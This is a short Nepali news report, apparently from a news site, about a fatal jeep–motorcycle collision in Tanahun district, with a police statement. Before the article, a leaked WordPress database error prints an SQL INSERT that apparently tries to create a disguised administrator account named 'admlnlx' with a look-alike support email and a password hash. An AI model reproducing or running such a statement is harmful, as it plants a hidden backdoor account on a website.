WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4AvvZeqWfrGZeaJNQxoIVrfQV0oYH1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 11:00:00', '', 'admlnlx', 'admlnlx')
दमौली,माघ १४ –
तनहुँको जामुने गाविस– २ स्थित गुणादीमा आज भएको सडक दुर्घटनामा एकको मृत्यु भएको छ ।
मृत्यु हुनेमा तनहुँ जामुने गाविस– २ का ४२ वर्षीय चुननारायण विक रहेको जिल्ला प्रहरी कार्यालय तनहुँका प्रहरी नायब निरीक्षक मनोज पाण्डेले बताउनुभयो ।
पोखराबाट दमौली आउँदै गरेको ग १ च २८९३ नं को जिपले विपरीत दिशाबाट आउँदै गरेको ग ३ प २११३ नं को मोटरसाइकललाई ठक्कर दिँदा मोटरसाइकल चालक विकको मृत्यु भएको हो ।
ठक्करबाट गम्भीर घाइते भएका विकको रत्नहरी अस्पतालमा उपचारका क्रममा मृत्यु भएको र जिप चालकलाई नियन्त्रणमा लिई अनुसन्धान भइरहेको प्रहरीले जनाएको छ ।- रासस